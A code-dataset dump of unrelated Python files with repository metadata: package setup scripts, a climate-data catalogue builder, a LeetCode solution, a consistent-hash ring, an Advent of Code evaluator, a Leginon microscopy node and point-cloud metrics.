    author_email='neil.massey@stfc.ac.uk',
    classifiers=[
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',  # example license
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        # Replace these appropriately if you are stuck on Python 2.
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Topic :: Internet :: WWW/HTTP',
        'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
    ],
)
| 0 | 0 | 0 |
97654bd538b29c3e1298416c0179a5829ea902ae | 1,097 | py | Python | build_ECMWF_cca_scratch_catalogue.py | AJueling/EC-Earth3-data | 26363e059bd7e9117dcf4fcd30f60fae7008573f | [
"Unlicense"
] | null | null | null | build_ECMWF_cca_scratch_catalogue.py | AJueling/EC-Earth3-data | 26363e059bd7e9117dcf4fcd30f60fae7008573f | [
"Unlicense"
] | null | null | null | build_ECMWF_cca_scratch_catalogue.py | AJueling/EC-Earth3-data | 26363e059bd7e9117dcf4fcd30f60fae7008573f | [
"Unlicense"
] | null | null | null | import os
import csv
from tqdm.autonotebook import tqdm
# Build a CSV catalogue of cmorised netCDF output by walking the scratch tree
# and deriving the CMIP6 facet values from each directory's path components.
csv_file = open("ecmwf_cca_scratch.csv", "w")
writer = csv.writer(csv_file)
writer.writerow(['mip_era','activity_id','institution_id','source_id','experiment_id','member_id','table_id','variable_id','grid_label','version','dcpp_start_year','time_range','nc_path'])
for store in ['CMIP6', 'PRIMAVERA']: # 46 & 12 secs, respectively
    # NOTE(review): this f-string contains no placeholder, so rootDir is
    # identical on both loop iterations and `store` only affects the print
    # below -- presumably the path was meant to include {store}; confirm.
    rootDir = f'/scratch/ms/nl/nm6/cmorised-results/EC-EARTH3P-HR-HighResMIP-highres-future/s2hh/CMIP6/HighResMIP/'
    print(store)
    print(os.listdir(rootDir))
    for dirName, subdirList, fileList in tqdm(os.walk(rootDir)):
        # Only catalogue directories that directly contain netCDF files.
        if not any(fname.endswith('.nc') for fname in fileList): continue
        # NOTE(review): the next statement discards its result (no-op), and
        # mip_era / the unpacked facet names / nc_path are computed but the
        # writerow below rebuilds the same values inline.
        os.path.normpath(dirName).split(os.path.sep)
        mip_era = 'CMIP6'
        # The last 9 path components are the DRS facets, in order.
        name_list = os.path.normpath(dirName).split(os.path.sep)[-9:]
        [activity_id, institution_id, source_id, experiment_id, member_id, table_id, variable_id, grid_label, version] = name_list
        nc_path = dirName+'/*.nc'
        # Two empty columns stand in for dcpp_start_year and time_range.
        writer.writerow(['CMIP6']+name_list+2*['']+[dirName+'/*.nc'])
csv_file.close() | 45.708333 | 188 | 0.701003 | import os
import csv
from tqdm.autonotebook import tqdm
# Build a CSV catalogue of cmorised netCDF output by walking the scratch tree
# and deriving the CMIP6 facet values from each directory's path components.
csv_file = open("ecmwf_cca_scratch.csv", "w")
writer = csv.writer(csv_file)
writer.writerow(['mip_era','activity_id','institution_id','source_id','experiment_id','member_id','table_id','variable_id','grid_label','version','dcpp_start_year','time_range','nc_path'])
for store in ['CMIP6', 'PRIMAVERA']: # 46 & 12 secs, respectively
    # NOTE(review): this f-string contains no placeholder, so rootDir is
    # identical on both loop iterations and `store` only affects the print
    # below -- presumably the path was meant to include {store}; confirm.
    rootDir = f'/scratch/ms/nl/nm6/cmorised-results/EC-EARTH3P-HR-HighResMIP-highres-future/s2hh/CMIP6/HighResMIP/'
    print(store)
    print(os.listdir(rootDir))
    for dirName, subdirList, fileList in tqdm(os.walk(rootDir)):
        # Only catalogue directories that directly contain netCDF files.
        if not any(fname.endswith('.nc') for fname in fileList): continue
        # NOTE(review): the next statement discards its result (no-op), and
        # mip_era / the unpacked facet names / nc_path are computed but the
        # writerow below rebuilds the same values inline.
        os.path.normpath(dirName).split(os.path.sep)
        mip_era = 'CMIP6'
        # The last 9 path components are the DRS facets, in order.
        name_list = os.path.normpath(dirName).split(os.path.sep)[-9:]
        [activity_id, institution_id, source_id, experiment_id, member_id, table_id, variable_id, grid_label, version] = name_list
        nc_path = dirName+'/*.nc'
        # Two empty columns stand in for dcpp_start_year and time_range.
        writer.writerow(['CMIP6']+name_list+2*['']+[dirName+'/*.nc'])
csv_file.close() | 0 | 0 | 0 |
c1ac39e50ebf00d5aed5ccd4b062788c2e2b5e48 | 1,838 | py | Python | python/python-algorithm-intervew/14-Tree/review/44-longest-univalue-path-review.py | bum12ark/algorithm | b6e262b0c29a8b5fb551db5a177a40feebc411b4 | [
"MIT"
] | 1 | 2022-03-06T03:49:31.000Z | 2022-03-06T03:49:31.000Z | python/python-algorithm-intervew/14-Tree/review/44-longest-univalue-path-review.py | bum12ark/algorithm | b6e262b0c29a8b5fb551db5a177a40feebc411b4 | [
"MIT"
] | null | null | null | python/python-algorithm-intervew/14-Tree/review/44-longest-univalue-path-review.py | bum12ark/algorithm | b6e262b0c29a8b5fb551db5a177a40feebc411b4 | [
"MIT"
] | null | null | null | """
url: https://leetcode.com/problems/longest-univalue-path/
* 가장 긴 동일 값의 경로
동일한 값을 지닌 가장 긴 경로를 찾아라.
- Example 1
Input :
5
/ \
4 5
/ \ \
1 1 5
Output : 2
Explaination : 루트에서 오른쪽 노드 끝까지 5->5->5로 가장 긴 이동 거리가 2이다.
- Example 2
Input :
1
/ \
4 5
/ \ \
4 4 5
Output : 2
Explaination : 왼쪽 리프 노드 4에서 형제 노드 4까지 4->4->4로 가장 긴 이동 거리가 2이다.
"""
# Definition for a binary tree node.
if __name__ == '__main__':
    # Manual smoke test: prints the computed path length next to the
    # expected answer (after "||") for visual comparison.
    # print(Solution().longestUnivaluePath(
    #     TreeNode(5, TreeNode(4, TreeNode(1), TreeNode(1)), TreeNode(5, None, TreeNode(5)))),
    #     "||",
    #     2
    # )
    print(Solution().longestUnivaluePath(
        TreeNode(4, TreeNode(4, TreeNode(4), TreeNode(4)), TreeNode(4))),
        "||",
        3
    )
"""
[시작 체크 리스트]
[] 1시간 지났으나 발상 불가 또는 아예 다른 길
[✓] 코드 50% 정도 완성
[] 1시간 보다 더 걸려서 코드 완성
[] 코드는 다 돌아가는데 효율성에서 걸림
[] 코드 완성
[완료 후 체크 리스트]
[] 아예 모르겠음
[] 중간 정도 이해함
[✓] 완벽히 이해함
""" | 20.651685 | 94 | 0.495103 | """
url: https://leetcode.com/problems/longest-univalue-path/
* 가장 긴 동일 값의 경로
동일한 값을 지닌 가장 긴 경로를 찾아라.
- Example 1
Input :
5
/ \
4 5
/ \ \
1 1 5
Output : 2
Explaination : 루트에서 오른쪽 노드 끝까지 5->5->5로 가장 긴 이동 거리가 2이다.
- Example 2
Input :
1
/ \
4 5
/ \ \
4 4 5
Output : 2
Explaination : 왼쪽 리프 노드 4에서 형제 노드 4까지 4->4->4로 가장 긴 이동 거리가 2이다.
"""
# Definition for a binary tree node.
class TreeNode:
    """Binary tree node: a payload value plus optional left/right children."""

    def __init__(self, val=0, left=None, right=None):
        """Store the value and child links (children default to None)."""
        self.val, self.left, self.right = val, left, right
class Solution:
    """LeetCode 687 -- longest univalue path, solved with a post-order DFS."""

    # Longest same-value path (in edges) found so far. Kept as a class-level
    # default for backward compatibility, but reset at the start of every
    # call (see below).
    result: int = 0

    def longestUnivaluePath(self, root: "TreeNode") -> int:
        """Return the number of edges on the longest path in which every
        node carries the same value.

        Each DFS call returns the longest single-sided univalue chain
        hanging below ``node``; the best left+right combination (a path may
        bend at a node) is tracked in ``self.result``.
        """
        # Bug fix: previously the accumulated maximum leaked between calls,
        # so reusing one Solution instance returned stale results.
        self.result = 0

        def dfs(node):
            # Post-order: returns chain length (in edges) extending upward.
            if not node:
                return 0
            left = dfs(node.left)
            right = dfs(node.right)
            # A chain only continues through a child with the same value.
            if node.left and node.val == node.left.val:
                left += 1
            else:
                left = 0
            if node.right and node.val == node.right.val:
                right += 1
            else:
                right = 0
            # The path may use both sides, bending at this node.
            self.result = max(self.result, left + right)
            # Only one side can be extended by the parent.
            return max(left, right)

        dfs(root)
        return self.result
if __name__ == '__main__':
    # Manual smoke test: prints the computed path length next to the
    # expected answer (after "||") for visual comparison.
    # print(Solution().longestUnivaluePath(
    #     TreeNode(5, TreeNode(4, TreeNode(1), TreeNode(1)), TreeNode(5, None, TreeNode(5)))),
    #     "||",
    #     2
    # )
    print(Solution().longestUnivaluePath(
        TreeNode(4, TreeNode(4, TreeNode(4), TreeNode(4)), TreeNode(4))),
        "||",
        3
    )
"""
[시작 체크 리스트]
[] 1시간 지났으나 발상 불가 또는 아예 다른 길
[✓] 코드 50% 정도 완성
[] 1시간 보다 더 걸려서 코드 완성
[] 코드는 다 돌아가는데 효율성에서 걸림
[] 코드 완성
[완료 후 체크 리스트]
[] 아예 모르겠음
[] 중간 정도 이해함
[✓] 완벽히 이해함
""" | 788 | 35 | 71 |
f3fa924397d5ab69738e473e7a0009efe14f6f77 | 577 | py | Python | setup.py | connor9/python-draytonwiser-api | db90222eda0c5e8b4920396961da8edc815fd920 | [
"MIT"
] | 7 | 2019-04-24T08:45:09.000Z | 2021-11-26T19:43:59.000Z | setup.py | connor9/python-draytonwiser-api | db90222eda0c5e8b4920396961da8edc815fd920 | [
"MIT"
] | 1 | 2019-03-02T22:26:47.000Z | 2019-03-02T22:26:47.000Z | setup.py | connor9/python-draytonwiser-api | db90222eda0c5e8b4920396961da8edc815fd920 | [
"MIT"
] | 1 | 2021-01-07T21:35:46.000Z | 2021-01-07T21:35:46.000Z | #!/usr/bin/env python
import os
import sys
# Fall back to distutils when setuptools is not installed.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup
# Shortcut: `python setup.py publish` builds and uploads a source dist.
if sys.argv[-1] == 'publish':
    os.system('python setup.py sdist upload')
    sys.exit()
version = '1.0.0'
# Distribution metadata for the Drayton Wiser API client.
setup(name='python-draytonwiser-api',
      version=version,
      description='Python API and command line tool for talking to Drayton Wiser Thermostat',
      url='',
      author='',
      author_email='',
      license='MIT',
      install_requires=['requests>=2.0'],
      packages=['draytonwiser'],
      zip_safe=True)
zip_safe=True) | 22.192308 | 93 | 0.651646 | #!/usr/bin/env python
import os
import sys
# Fall back to distutils when setuptools is not installed.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup
# Shortcut: `python setup.py publish` builds and uploads a source dist.
if sys.argv[-1] == 'publish':
    os.system('python setup.py sdist upload')
    sys.exit()
version = '1.0.0'
# Distribution metadata for the Drayton Wiser API client.
setup(name='python-draytonwiser-api',
      version=version,
      description='Python API and command line tool for talking to Drayton Wiser Thermostat',
      url='',
      author='',
      author_email='',
      license='MIT',
      install_requires=['requests>=2.0'],
      packages=['draytonwiser'],
      zip_safe=True)
c3391de09389f23314f6f47dc595a5004b17213d | 1,167 | py | Python | setup.py | ericmbell1/flowsa | d251301864289a4de42dda118c9c6da41bcf4cf0 | [
"CC0-1.0"
] | null | null | null | setup.py | ericmbell1/flowsa | d251301864289a4de42dda118c9c6da41bcf4cf0 | [
"CC0-1.0"
] | null | null | null | setup.py | ericmbell1/flowsa | d251301864289a4de42dda118c9c6da41bcf4cf0 | [
"CC0-1.0"
] | null | null | null | from setuptools import setup
setup(
name='flowsa',
version='0.0.1',
packages=['flowsa'],
package_dir={'flowsa': 'flowsa'},
package_data={'flowsa': [
"data/*.*", "output/*.*"]},
include_package_data=True,
install_requires=[
'fedelemflowlist @ git+https://github.com/USEPA/Federal-LCA-Commons-Elementary-Flow-List',
'pandas>=1.0',
'pip>=9',
'setuptools>=41',
'pyyaml>=5.3',
'pyarrow==0.15',
'requests>=2.22.0',
'appdirs>=1.4.3',
'pycountry>=19.8.18',
'xlrd>=1.2.0',
'requests_ftp==0.3.1',
'tabula-py>=2.1.1'
],
url='https://github.com/USEPA/FLOWSA',
license='CC0',
author='Wesley Ingwersen',
author_email='ingwersen.wesley@epa.gov',
classifiers=[
"Development Status :: 1 - Alpha",
"Environment :: IDE",
"Intended Audience :: Science/Research",
"License :: CC0",
"Programming Language :: Python :: 3.x",
"Topic :: Utilities",
],
description='Complies and provides a standardized list of elementary flows and flow mappings for life cycle assessment data'
)
| 29.923077 | 128 | 0.569837 | from setuptools import setup
# Distribution metadata for the flowsa package.
setup(
    name='flowsa',
    version='0.0.1',
    packages=['flowsa'],
    package_dir={'flowsa': 'flowsa'},
    # Bundle the data and output resources with the package.
    package_data={'flowsa': [
        "data/*.*", "output/*.*"]},
    include_package_data=True,
    install_requires=[
        # fedelemflowlist is installed straight from its Git repository.
        'fedelemflowlist @ git+https://github.com/USEPA/Federal-LCA-Commons-Elementary-Flow-List',
        'pandas>=1.0',
        'pip>=9',
        'setuptools>=41',
        'pyyaml>=5.3',
        'pyarrow==0.15',
        'requests>=2.22.0',
        'appdirs>=1.4.3',
        'pycountry>=19.8.18',
        'xlrd>=1.2.0',
        'requests_ftp==0.3.1',
        'tabula-py>=2.1.1'
    ],
    url='https://github.com/USEPA/FLOWSA',
    license='CC0',
    author='Wesley Ingwersen',
    author_email='ingwersen.wesley@epa.gov',
    classifiers=[
        "Development Status :: 1 - Alpha",
        "Environment :: IDE",
        "Intended Audience :: Science/Research",
        "License :: CC0",
        "Programming Language :: Python :: 3.x",
        "Topic :: Utilities",
    ],
    # NOTE(review): "Complies" is presumably a typo for "Compiles".
    description='Complies and provides a standardized list of elementary flows and flow mappings for life cycle assessment data'
)
4aef9a3d475f82ce4715b6a324d21777ae94670d | 2,102 | py | Python | kpages/consistenthash.py | leicj/kpages | 60a46af26b50b3de8678ec8532b0212c43b58374 | [
"MIT"
] | 9 | 2015-01-14T08:53:06.000Z | 2018-05-29T07:08:23.000Z | kpages/consistenthash.py | leicj/kpages | 60a46af26b50b3de8678ec8532b0212c43b58374 | [
"MIT"
] | 2 | 2015-06-02T05:48:48.000Z | 2015-06-02T05:48:48.000Z | kpages/consistenthash.py | leicj/kpages | 60a46af26b50b3de8678ec8532b0212c43b58374 | [
"MIT"
] | 4 | 2015-01-14T08:53:06.000Z | 2022-02-21T12:35:14.000Z | # -*- coding:utf-8 -*-
"""
author comger@gmail.com
Consisten hash
"""
from hashlib import md5
from bisect import bisect_right
class ConsistentHash(object):
"""
算法思路:
1. 在N个机器中、每台M个节点、N*M 个节点形成节点环
2. 计算每个机器拥有的节点Node
3. 新内容key添加时,get_node(key)获取key被分配的node;及get_host(key)获取key 被分配到的机器
* 节点的引入:保证每台机器负载均衡
"""
if __name__ == '__main__':
    # Python 2 only: `string.letters` and `xrange` do not exist in Python 3.
    from random import sample
    from string import letters
    # Disabled load-balancing benchmark (kept as a bare string literal):
    # hashes 100k random keys and reports how evenly they spread per host.
    '''
    loop = 100000
    hosts = ["192.168.1.%d" % i for i in xrange(1, 10)]
    ch = ConsistentHash(hosts,replicas=100)
    rnd_key = lambda: "".join(sample(letters, 10))
    count = {}
    for i in xrange(loop):
        host = ch.get_host(rnd_key())
        count[host] = count[host] + 1 if host in count else 1
    avg = loop / len(hosts)
    for h in sorted(count.iterkeys()):
        c = count[h]
        print("{0:15} {1:8} {2:8.2f}%".format(h, c, float(c) / avg * 100))
        if c< avg*0.6:
            print("ERROR", h,c)
    '''
    # Quick smoke test: map a single key onto a 4-host ring.
    dh = 'asdfasd'
    hosts = ["192.168.1.%d" % i for i in xrange(1, 5)]
    ch = ConsistentHash(hosts,replicas=10)
    print(ch.get_host(dh))
| 25.325301 | 74 | 0.556137 | # -*- coding:utf-8 -*-
"""
author comger@gmail.com
Consisten hash
"""
from hashlib import md5
from bisect import bisect_right
class ConsistentHash(object):
    """Consistent-hash ring (Python 2 code: uses `xrange`, `md5` on str).

    Approach:
        1. N hosts x M replica slots each form a ring of N*M virtual nodes.
        2. Each host owns the virtual nodes derived from "<host>_<i>" keys.
        3. For a new key, get_node(key) returns its ring position and
           get_host(key) the host responsible for it.
    Replica (virtual) nodes are used to balance load across hosts.
    """
    def __init__(self, hosts, replicas = 10):
        # hsh (as str) -> host owning that virtual node
        self._hosts = {}
        # sorted list of virtual-node hash positions
        self._ring = []
        # NOTE(review): hashing modulo exactly N*replicas with N*replicas
        # keys makes collisions very likely; a collision overwrites the
        # _hosts entry while both ring insertions remain -- confirm this
        # skew is acceptable.
        self._length = len(hosts)*replicas
        self._build(hosts, replicas)
    def _build(self, hosts, replicas):
        # Insert `replicas` virtual nodes per host, keeping the ring sorted.
        for host in hosts:
            for i in xrange(replicas):
                key = "{0}_{1}".format(host,i)
                hsh = self._hash(key)
                self._hosts[str(hsh)] = host
                # NOTE(review): leftover debug output.
                print(bisect_right(self._ring, hsh),hsh,host)
                self._ring.insert(bisect_right(self._ring, hsh), hsh)
        # NOTE(review): leftover debug output.
        print(self._ring)
    def _hash(self,s):
        # Fold the md5 digest into a ring position in [0, _length).
        return hash(md5(s).digest()) % self._length
    def get_node(self, key):
        # First virtual node clockwise from the key's hash (wrapping).
        hsh = self._hash(key)
        index = bisect_right(self._ring, hsh)
        if index >= len(self._ring): index = 0
        return self._ring[index]
    def get_host(self, key):
        # Host that owns the virtual node the key lands on.
        return self._hosts[str(self.get_node(key))]
if __name__ == '__main__':
    # Python 2 only: `string.letters` and `xrange` do not exist in Python 3.
    from random import sample
    from string import letters
    # Disabled load-balancing benchmark (kept as a bare string literal):
    # hashes 100k random keys and reports how evenly they spread per host.
    '''
    loop = 100000
    hosts = ["192.168.1.%d" % i for i in xrange(1, 10)]
    ch = ConsistentHash(hosts,replicas=100)
    rnd_key = lambda: "".join(sample(letters, 10))
    count = {}
    for i in xrange(loop):
        host = ch.get_host(rnd_key())
        count[host] = count[host] + 1 if host in count else 1
    avg = loop / len(hosts)
    for h in sorted(count.iterkeys()):
        c = count[h]
        print("{0:15} {1:8} {2:8.2f}%".format(h, c, float(c) / avg * 100))
        if c< avg*0.6:
            print("ERROR", h,c)
    '''
    # Quick smoke test: map a single key onto a 4-host ring.
    dh = 'asdfasd'
    hosts = ["192.168.1.%d" % i for i in xrange(1, 5)]
    ch = ConsistentHash(hosts,replicas=10)
    print(ch.get_host(dh))
| 805 | 0 | 142 |
69141d14f670c53a6708e678c426971f37b401ee | 1,824 | py | Python | python/2020_18_2.py | wensby/advent-of-code | 50cd7fa2d35674d868a79ac8c75be24a43267e2b | [
"MIT"
] | null | null | null | python/2020_18_2.py | wensby/advent-of-code | 50cd7fa2d35674d868a79ac8c75be24a43267e2b | [
"MIT"
] | null | null | null | python/2020_18_2.py | wensby/advent-of-code | 50cd7fa2d35674d868a79ac8c75be24a43267e2b | [
"MIT"
] | null | null | null | import sys
import operator
func_by_op = {
'*': operator.mul,
'+': operator.add
}
if __name__ == '__main__':
    # Read the full puzzle input from stdin and print the summed result.
    print(solve(sys.stdin.read()))
| 24.986301 | 75 | 0.577851 | import sys
import operator
func_by_op = {
'*': operator.mul,
'+': operator.add
}
def solve(input):
    """Evaluate every line of the puzzle *input* and return the grand total."""
    total = 0
    for line in input.splitlines():
        total += evaluate(line)
    return total
def evaluate(expression):
    """Recursively evaluate *expression* under AoC 2020 day 18 part-2 rules:
    '+' binds tighter than '*', parentheses bind tightest.
    """
    expression = expression.replace(' ', '')
    # Base case: a bare number.
    if expression.isnumeric():
        return int(expression)
    parts = get_parts(expression)
    # A single part is a fully parenthesised expression: strip the brackets.
    if len(parts) == 1:
        return evaluate(parts[0][1:-1])
    # Reduce the highest-precedence operator first ('+' before '*'):
    # splice the reduced triple's value back into the token string and recurse.
    for op in ['+', '*']:
        for i, part in enumerate(parts):
            if part == op:
                result = func_by_op[op](evaluate(parts[i-1]), evaluate(parts[i+1]))
                before = ''.join(parts[:i-1])
                after = ''.join(parts[i+2:])
                return evaluate(before+str(result)+after)
    # NOTE(review): for well-formed input every multi-part expression has a
    # top-level '+' or '*', so the loop above always returns and both branches
    # below look unreachable -- confirm before relying on them.
    if len(parts) > 1:
        first = evaluate(parts[0])
        second = evaluate(parts[2])
        if parts[1] == '+':
            return evaluate(str(first + second) + ''.join(parts[3:]))
        elif parts[1] == '*':
            return evaluate(str(first * second) + ''.join(parts[3:]))
    else:
        return evaluate(parts[0])
def get_parts(expression):
    """Split a space-free *expression* into top-level tokens: multi-digit
    numbers, operator characters, and fully parenthesised sub-expressions
    (returned with their surrounding brackets intact).
    """
    tokens = []
    start = 0
    state = None          # None | 'num' | 'paren'
    depth = 0             # parenthesis nesting while state == 'paren'
    for pos, ch in enumerate(expression):
        if state is None:
            if ch.isdigit():
                state, start = 'num', pos
            elif ch == '(':
                state, start = 'paren', pos
                depth += 1
            else:
                # Operators (and any other single char) pass straight through.
                tokens.append(ch)
        elif state == 'num':
            # A number ends at the next operator; digits just extend it.
            if ch in '*+':
                state = None
                tokens.append(expression[start:pos])
                tokens.append(ch)
        else:  # inside parentheses: only track nesting depth
            if ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
                if depth == 0:
                    tokens.append(expression[start:pos + 1])
                    state = None
    # Flush a trailing number that ran to the end of the string.
    if state == 'num':
        tokens.append(expression[start:pos + 1])
    return tokens
if __name__ == '__main__':
    # Read the full puzzle input from stdin and print the summed result.
    print(solve(sys.stdin.read()))
| 1,608 | 0 | 69 |
614963d88fcca991bc59d21e5afd5ad6b1ff43b6 | 3,490 | py | Python | lib/python2.7/site-packages/leginon/gridentry.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | null | null | null | lib/python2.7/site-packages/leginon/gridentry.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | null | null | null | lib/python2.7/site-packages/leginon/gridentry.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | 1 | 2019-09-05T20:58:37.000Z | 2019-09-05T20:58:37.000Z | #
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from leginon import leginondata
import event
import threading
import node
import project
import gui.wx.GridEntry
| 30.614035 | 79 | 0.729513 | #
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from leginon import leginondata
import event
import threading
import node
import project
import gui.wx.GridEntry
class GridEntry(node.Node):
    """Leginon node for registering EM grids and launching data collection.

    Python 2 code (note the `except ..., e` syntax). Listens for
    mosaic/target-list completion events and forwards them to the GUI panel.
    """
    eventinputs = node.Node.eventinputs + [event.TargetListDoneEvent,
                                           event.MosaicDoneEvent]
    eventoutputs = node.Node.eventoutputs + [event.MakeTargetListEvent
                                             ]
    panelclass = gui.wx.GridEntry.Panel
    settingsclass = leginondata.GridEntrySettingsData
    defaultsettings = {
        'grid name': None,
    }
    def __init__(self, id, session, managerlocation, **kwargs):
        node.Node.__init__(self, id, session, managerlocation, **kwargs)
        # Resolve the project this session belongs to (None if unavailable).
        self.projectid = self.getProjectId(session)
        self.addEventInput(event.MosaicDoneEvent, self.handleGridDataCollectionDone)
        self.addEventInput(event.TargetListDoneEvent,
                           self.handleGridDataCollectionDone)
        self.start()
    def publishNewEMGrid(self, newgrid):
        """Insert a new EMGridData record named *newgrid* and select it."""
        emgridq = leginondata.EMGridData()
        emgridq['name'] = newgrid
        emgridq['project'] = self.projectid
        try:
            self.publish(emgridq, database=True)
        except node.PublishError:
            # Propagate so the GUI can report the failure (onBadEMGridName).
            raise
        self.settings['grid name'] = newgrid
        self.logger.info('new grid inserted into the database')
    def getProjectId(self, sessiondata):
        """Return the project id for *sessiondata*, or None if the project
        database is not reachable."""
        try:
            projectdata = project.ProjectData()
        except project.NotConnectedError, e:
            self.logger.warning('Failed to associate the grid to a project: %s' % e)
            return None
        return projectdata.getProjectId(sessiondata)
    def getGridNames(self):
        """Return the distinct grid names known for this project."""
        gridnames = []
        if self.projectid is not None:
            emgridq = leginondata.EMGridData(project = self.projectid)
        else:
            emgridq = leginondata.EMGridData()
        results = emgridq.query()
        if results:
            for result in results:
                newname = result['name']
                if newname not in gridnames:
                    gridnames.append(newname)
                else:
                    self.logger.warning('Duplicated grid name "%s" not included' % newname)
        return gridnames
    def getEMGrid(self, gridname):
        """Return the first EMGridData record matching *gridname*, or None."""
        if self.projectid is not None:
            emgridq = leginondata.EMGridData(project = self.projectid, name = gridname)
        else:
            emgridq = leginondata.EMGridData(name = gridname)
        results = emgridq.query(results=1)
        if results:
            return results[0]
        else:
            return None
    def makeGridData(self, gridname):
        """Publish and return a GridData for the next insertion of
        *gridname* (previous max insertion + 1), or None if the grid is
        unknown."""
        emgriddata = self.getEMGrid(gridname)
        if emgriddata is None:
            return None
        emgridid = emgriddata.dbid
        initializer = {'emgrid': emgriddata}
        querydata = leginondata.GridData(initializer=initializer)
        griddatalist = self.research(querydata)
        # Find the highest insertion number used so far for this grid.
        insertion = 0
        for griddata in griddatalist:
            if griddata['insertion'] > insertion:
                insertion = griddata['insertion']
        initializer = {'grid ID': None, 'insertion': insertion+1, 'emgrid': emgriddata}
        griddata = leginondata.GridData(initializer=initializer)
        self.publish(griddata, database=True)
        return griddata
    def submitGrid(self):
        """Emit a MakeTargetListEvent for the currently selected grid and
        return the published GridData (None on failure)."""
        gridname = self.settings['grid name']
        evt = event.MakeTargetListEvent()
        evt['grid'] = self.makeGridData(gridname)
        if evt['grid'] is None:
            self.logger.error('Data collection event not sent')
        else:
            self.outputEvent(evt)
            self.logger.info('Data collection initiated')
        return evt['grid']
    def onBadEMGridName(self, e):
        # GUI callback when inserting a new grid name failed.
        self.logger.error('New grid entry failed: %s' % e)
    def handleGridDataCollectionDone(self, ievent):
        # Notify the GUI panel that the grid's data collection finished.
        self.panel.onGridDone()
6853cb88362b98fa5dd8b1c33bab2fb618f22e13 | 5,047 | py | Python | tofnet/pointcloud/metrics.py | victorjoos/tof2net | 068f5f08a241dbfb950251bea52fd9379466bf2f | [
"MIT"
] | null | null | null | tofnet/pointcloud/metrics.py | victorjoos/tof2net | 068f5f08a241dbfb950251bea52fd9379466bf2f | [
"MIT"
] | 8 | 2021-02-02T23:07:37.000Z | 2022-03-12T00:51:26.000Z | tofnet/pointcloud/metrics.py | victorjoos/tof2net | 068f5f08a241dbfb950251bea52fd9379466bf2f | [
"MIT"
] | 2 | 2020-10-01T08:23:24.000Z | 2020-11-09T22:01:47.000Z | import numpy as np
from numpy.linalg import norm
from shapely.geometry import Polygon
from copy import deepcopy
import open3d
from tofnet.pointcloud.utils import rotate, transform_with_conf
from tofnet.pointcloud.visualize import visualize_pointcloud
from tofnet.annotations.segmentation import find_segmentation, find_z
def floor_similarity(ground_cfg, pred_cfg, eps=1.e-8):
    """Angular difference (in degrees) between the floor orientations
    implied by two camera configs.

    Arguments:
        ground_cfg: ground truth config containing a "camera" section with
            inclination and lateral_inclination
        pred_cfg: prediction (same structure as ground_cfg)
        eps: lower bound on the norm product, guarding against division by
            zero in the cosine similarity

    Returns:
        similarity: angle in degrees between the two rotated reference
            vectors (arccos of their clipped cosine similarity)
    """
    reference = np.array([1, 1, 1])
    vec_gt = _rotate_from_cfg(ground_cfg, reference)
    vec_pred = _rotate_from_cfg(pred_cfg, reference)
    denom = max(norm(vec_gt) * norm(vec_pred), eps)
    cosine = np.clip(np.dot(vec_gt, vec_pred) / denom, -1, 1)
    return np.degrees(np.arccos(cosine))
def bed_similarity(ground_cfg, pred_cfg):
    """Compute 2d IoU for the bed, with common camera config."""
    # Placeholder: this metric has not been implemented yet.
    raise NotImplementedError()
def bprojIoU(gt_cfg, pred_cfg):
    """ Computes the bounding box IoU from 2 different configs while accounting for
    differences in floor rotation
    """
    from shapely import geometry
    res = []
    # Build the 3D corner points of each config's bed box in camera space.
    for cfg in [gt_cfg, pred_cfg]:
        height = cfg["camera"].get("height", 2.6)
        angles = (
            180-cfg["camera"]["inclination"], cfg["camera"]["lateral_inclination"],
            cfg["bed"]["orientation"]
        )
        alpha, beta, gamma = (np.radians(a) for a in angles)
        center = [cfg["bed"]["centerX"], cfg["bed"]["centerY"]]
        # Bed rectangle corners centred at the origin, then rotated by the
        # bed orientation and translated to the bed centre (floor plane).
        points = get_bbox_points(cfg)
        points = rotate(-gamma, points)
        points += center
        # Lift to 3D at z = -camera_height, then undo the camera rotations.
        points3d = np.zeros((len(points), 3))
        points3d[:,:2] = points
        points3d[:,-1] = points3d[:,-1]-height
        points3d = rotate(-beta, points3d, axis='y')
        points3d = rotate(-np.pi, points3d, axis='z')
        points3d = rotate(-alpha, points3d, axis='x')
        res.append(points3d)
    gt_points, pred_points = res
    # compute floor normal
    N = np.cross(gt_points[1,:]-gt_points[0,:], gt_points[3,:]-gt_points[0,:])
    d = N@gt_points[0,:]
    # project pred on that plane
    T = (d - pred_points@N)/(N@N)
    projected_pred_points = pred_points + np.expand_dims(T, axis=-1)*np.expand_dims(N, axis=0)
    # compute iou (on the x/y coordinates of the common plane)
    gt_poly = geometry.Polygon(gt_points[:,:2])
    pr_poly = geometry.Polygon(projected_pred_points[:,:2])
    iou = gt_poly.intersection(pr_poly).area/gt_poly.union(pr_poly).area
    return iou
def cIoU(gt_mask, pred_mask, c):
    """Image-wise IoU of class *c* between a ground-truth and predicted mask."""
    in_pred = pred_mask == c
    in_gt = gt_mask == c
    intersection = np.sum(in_pred & in_gt)
    union = np.sum(in_pred | in_gt)
    # |A ∩ B| / |A ∪ B|  ==  tp / (tp + fp + fn)
    return intersection / union
def full_similarity(pcd, gt_cfg, pred_cfg, bed_class=2, sample=None, use_z=False):
    """Compare a ground-truth and a predicted config on the same point cloud.

    Returns a tuple:
        (0, iou_proj): projected bounding-box IoU (first slot unused),
        divers_errors: (orientation diff deg, centre error, length error,
                        width error),
        pred_mask, gt_mask: segmentation masks from each config,
        pnts: mean distance of predicted bed points from the origin.
    """
